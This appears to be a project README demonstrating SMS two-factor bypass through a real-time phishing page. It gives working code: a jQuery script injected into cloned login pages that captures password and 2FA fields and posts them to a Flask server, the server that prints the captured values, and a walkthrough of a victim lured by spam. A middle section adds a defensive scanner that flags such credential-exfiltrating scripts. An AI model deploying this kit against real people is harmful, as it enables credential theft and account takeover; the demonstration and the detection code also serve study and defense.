2FA Steal

Description

Just a simple demonstration, inspired by John Hammond's video, of bypassing SMS-based 2FA with a real-time phishing page. You can watch the video here.

Languages and Utilities Used

- Linux
- Python
- Java

Environments Used

- Windows 10
- Kali

Procedure:

- Took the HTML of the target login page from the browser's "View Page Source"
- Added the JSON payload (below) to that HTML

This is the payload used in the HTML pages. Bear in mind that the input selector (`input[type=password]`) must be changed to match the field on each web page (for example, the 2FA page uses a text input for the code, not a password input).

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script>
    $('button').click(function (e) {
        e.preventDefault();

        // Read the value of the password field when the button is clicked
        var auth = $('input[type=password]').val();

        // Send it to the local Flask app, then move the user on to the next page
        $.post(
            "http://localhost:5000/auth",
            { "password": auth },
            function (data, status) {
                window.location = "http://localhost:5000/login";
            }
        );
        return false;
    });
</script>

- Created a simple flask python app and hosted it

from flask import Flask
from flask import send_file, make_response, request

app = Flask(__name__)

# /auth is the endpoint the JS payload posts to. If you rename the form field
# ("password") here, change it in the payload used in the web pages as well.

@app.route("/auth", methods=["POST"])
def auth():
    # Print whatever the page posted (the captured field) to the terminal
    print(request.form.to_dict())
    return "ok"

@app.route("/")
def index():
    # Serve the cloned password-reset page
    response = make_response(send_file("reset.html"))
    response.headers.add("Access-Control-Allow-Origin", "*")
    return response

@app.route("/login")
def login():
    # Serve the cloned 2FA-code page
    return send_file("2fa.html")

if __name__ == "__main__":
    app.run()

- Accessed the app's IP from another machine and captured the submitted input on the terminal
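The procedure above relies on one tell-tale pattern: an inline script on the cloned page reads the password (or code) field and posts it to an origin that is not the page's own. As an added example that is not part of this repository, the following Python script scans a saved HTML page for exactly that pattern, so a defender triaging a reported phishing page (or checking a page before a user enters credentials) can flag it. The two sample pages are constructed here; `SUSPICIOUS_PAGE` mirrors the payload shown above, and the page origin passed to `find_exfil` is an assumed example value.

```python
"""Heuristic scanner for credential-exfiltrating scripts in a saved HTML page.

Flags inline <script> blocks that read a password field and send data to an
origin other than the page's own, plus <form action> targets on foreign hosts.
Added example, not the repository's code; sample pages below are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# A script body that mentions a password field...
READS_PASSWORD = re.compile(r'''input\[type=['"]?password['"]?\]|type\s*=\s*['"]?password''', re.I)
# ...and uses a mechanism that can send data somewhere...
SENDS_DATA = re.compile(r"\$\.(post|ajax)\s*\(|fetch\s*\(|XMLHttpRequest|navigator\.sendBeacon", re.I)
# ...to an absolute URL literal.
URL_LITERAL = re.compile(r'''["'](https?://[^"'\s]+)["']''', re.I)


class _Collector(HTMLParser):
    """Collects inline <script> bodies and <form action> targets."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.form_actions = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and not a.get("src"):   # inline scripts only
            self._in_script = True
            self._buf = []
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append("".join(self._buf))


def _host(url):
    return (urlparse(url).hostname or "").lower()


def find_exfil(html, page_url):
    """Return (kind, target) findings for credential posts to a foreign origin."""
    page_host = _host(page_url)
    collector = _Collector()
    collector.feed(html)
    findings = []
    for body in collector.scripts:
        if READS_PASSWORD.search(body) and SENDS_DATA.search(body):
            for url in URL_LITERAL.findall(body):
                if _host(url) != page_host:
                    findings.append(("script", url))
    for action in collector.form_actions:
        if action.startswith(("http://", "https://", "//")) and _host(action) != page_host:
            findings.append(("form", action))
    return findings


# Constructed sample: a cloned reset page carrying the payload from the procedure.
SUSPICIOUS_PAGE = """
<form id="reset">
  <input type="password" name="password">
  <button>Next</button>
</form>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script>
$('button').click(function (e) {
  e.preventDefault();
  var auth = $('input[type=password]').val();
  $.post("http://localhost:5000/auth", {"password": auth}, function () {
    window.location = "http://localhost:5000/login";
  });
  return false;
});
</script>
"""

# Constructed sample: a legitimate page that submits to its own origin.
BENIGN_PAGE = """
<form method="post" action="/login">
  <input type="password" name="pw">
  <button>Sign in</button>
</form>
<script>document.querySelector('form').addEventListener('submit', function () {});</script>
"""


def check_pages():
    """Scan both constructed pages as if served from the assumed origin accounts.example.com."""
    return {
        "suspicious": len(find_exfil(SUSPICIOUS_PAGE, "https://accounts.example.com/reset")),
        "benign": len(find_exfil(BENIGN_PAGE, "https://accounts.example.com/login")),
    }


if __name__ == "__main__":
    for kind, target in find_exfil(SUSPICIOUS_PAGE, "https://accounts.example.com/reset"):
        print(f"{kind}: sends credentials to foreign origin {target}")
    print(check_pages())
```

The scanner only inspects inline scripts and absolute URL literals, so it misses external scripts loaded via `src`, obfuscated URLs and relative paths that are rewritten by a reverse proxy; treat a hit as a reason to look closer, not as proof, and a miss as no evidence either way.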

Process Walkthrough:

- Hosting the app publicly
  [screenshot: Server1]
- The victim reaches the web page by clicking a spam email or dodgy link and tries to log in with their password
  [screenshot: victim1]
- When the victim presses Next, the account password is printed in the attacker's terminal
  [screenshot: server2]
- The victim is then shown a page asking for the verification code that was sent to their phone
  [screenshot: victim2]
- On clicking Next, the attacker receives the 2FA code, which can be used to log in to the victim's account
  [screenshot: victim2]